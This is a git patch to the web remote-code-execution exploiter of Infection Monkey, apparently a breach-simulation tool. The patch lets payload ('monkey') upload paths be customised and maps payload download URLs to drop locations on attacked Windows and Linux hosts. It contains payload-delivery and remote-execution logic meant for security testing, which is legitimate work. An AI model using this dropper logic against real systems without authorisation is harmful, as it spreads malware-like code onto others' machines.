From 5565a8041888bba1c8d722548104446ea85ad9f1 Mon Sep 17 00:00:00 2001
From: Vakaris <vaoxygen@gmail.com>
Date: Fri, 17 Aug 2018 13:53:09 +0300
Subject: [PATCH] Web_RCE framework now supports custom monkey uploading paths(
 we don't always have permissions to uppload to C:\Windows)

---
 infection_monkey/exploit/web_rce.py | 68 ++++++++++++++++++++++++++---
 1 file changed, 62 insertions(+), 6 deletions(-)

diff --git a/infection_monkey/exploit/web_rce.py b/infection_monkey/exploit/web_rce.py
index 48a599f5c..c26d4a920 100644
--- a/infection_monkey/exploit/web_rce.py
+++ b/infection_monkey/exploit/web_rce.py
@@ -17,9 +17,19 @@ LOOK_FOR_FILE = "ls %s"
 
 class WebRCE(HostExploiter):
 
-    def __init__(self, host):
+    def __init__(self, host, monkey_target_paths=None):
+        """
+        :param host: Host that we'll attack
+        :param monkey_target_paths: Dict in format {'linux': '/tmp/monkey.sh', 'win32': './monkey32.exe', 'win64':... }
+        """
         super(WebRCE, self).__init__(host)
         self._config = __import__('config').WormConfiguration
+        if monkey_target_paths:
+            self.monkey_target_paths = monkey_target_paths
+        else:
+            self.monkey_target_paths = {'linux': self._config.dropper_target_path_linux,
+                                        'win32': self._config.dropper_target_path_win_32,
+                                        'win64': self._config.dropper_target_path_win_64}
         self.HTTP = [str(port) for port in self._config.HTTP_PORTS]
         self.skip_exist = self._config.skip_exploit_if_file_exist
 
@@ -87,7 +97,7 @@ class WebRCE(HostExploiter):
         candidate_services = {}
         candidate_services.update({
             service: self.host.services[service] for service in self.host.services if
-            (self.host.services[service]['name'] in names)
+            (self.host.services[service] and self.host.services[service]['name'] in names)
         })
 
         valid_ports = [(port, candidate_services['tcp-' + str(port)]['data'][1]) for port in port_list if
@@ -205,9 +215,9 @@ class WebRCE(HostExploiter):
         """
         paths = []
         if 'linux' in self.host.os['type']:
-            paths.append(self._config.dropper_target_path_linux)
+            paths.append(self.monkey_target_paths['linux'])
         else:
-            paths.extend([self._config.dropper_target_path_win_32, self._config.dropper_target_path_win_64])
+            paths.extend([self.monkey_target_paths['win32'], self.monkey_target_paths['win64']])
         for path in paths:
             if self.check_remote_monkey_file(url, path):
                 return True
@@ -251,7 +261,7 @@ class WebRCE(HostExploiter):
             return False
         # Determine which destination path to use
         LOG.debug("Monkey path found")
-        path = get_monkey_dest_path(src_path)
+        path = self.get_monkey_upload_path(src_path)
         if not path:
             return False
         # Create server for http download and wait for it's startup.
@@ -323,7 +333,11 @@ class WebRCE(HostExploiter):
         LOG.info("Trying to execute remote monkey")
         # Get monkey command line
         if dropper and path:
-            monkey_cmd = build_monkey_commandline(self.host, get_monkey_depth() - 1, path)
+            # If dropper is chosen we try to move monkey to default location
+            default_path = self.custom_to_dropper_path(path)
+            if default_path is False:
+                return False
+            monkey_cmd = build_monkey_commandline(self.host, get_monkey_depth() - 1, default_path)
             command = RUN_MONKEY % {'monkey_path': path, 'monkey_type': DROPPER_ARG, 'parameters': monkey_cmd}
         else:
             monkey_cmd = build_monkey_commandline(self.host, get_monkey_depth() - 1)
@@ -346,3 +360,45 @@ class WebRCE(HostExploiter):
             return False
         LOG.info("Execution attempt finished")
         return resp
+
+    def get_monkey_upload_path(self, url_to_monkey):
+        """
+        Gets destination path from one of WEB_RCE predetermined paths(self.monkey_target_paths).
+        :param url_to_monkey: Hosted monkey's url. egz : http://localserver:9999/monkey/windows-32.exe
+        :return: Corresponding monkey path from self.monkey_target_paths
+        """
+        if not url_to_monkey or ('linux' not in url_to_monkey and 'windows' not in url_to_monkey):
+            LOG.error("Can't get destination path because source path %s is invalid.", url_to_monkey)
+            return False
+        try:
+            if 'linux' in url_to_monkey:
+                return self.monkey_target_paths['linux']
+            elif 'windows-32' in url_to_monkey:
+                return self.monkey_target_paths['win32']
+            elif 'windows-64' in url_to_monkey:
+                return self.monkey_target_paths['win64']
+            else:
+                LOG.error("Could not figure out what type of monkey server was trying to upload, "
+                          "thus destination path can not be chosen.")
+                return False
+        except AttributeError:
+            LOG.error("Seems like monkey's source configuration property names changed. "
+                      "Can not get destination path to upload monkey")
+            return False
+
+    def custom_to_dropper_path(self, path):
+        try:
+            key = self.monkey_target_paths.keys()[self.monkey_target_paths.values().index(path)]
+        except KeyError:
+            LOG.error("The path you used is not in monkey_target_paths array. Skipping")
+            return False
+        if key == 'linux':
+            return self._config.dropper_target_path_linux
+        elif key == 'win32':
+            return self._config.dropper_target_path_win_32
+        elif key == 'win64':
+            return self._config.dropper_target_path_win_64
+        else:
+            LOG.error("Unknown key was found. Please use \"linux\", \"win32\" and \"win64\" keys to initialize "
+                      "custom dict of monkey's destination paths")
+            return False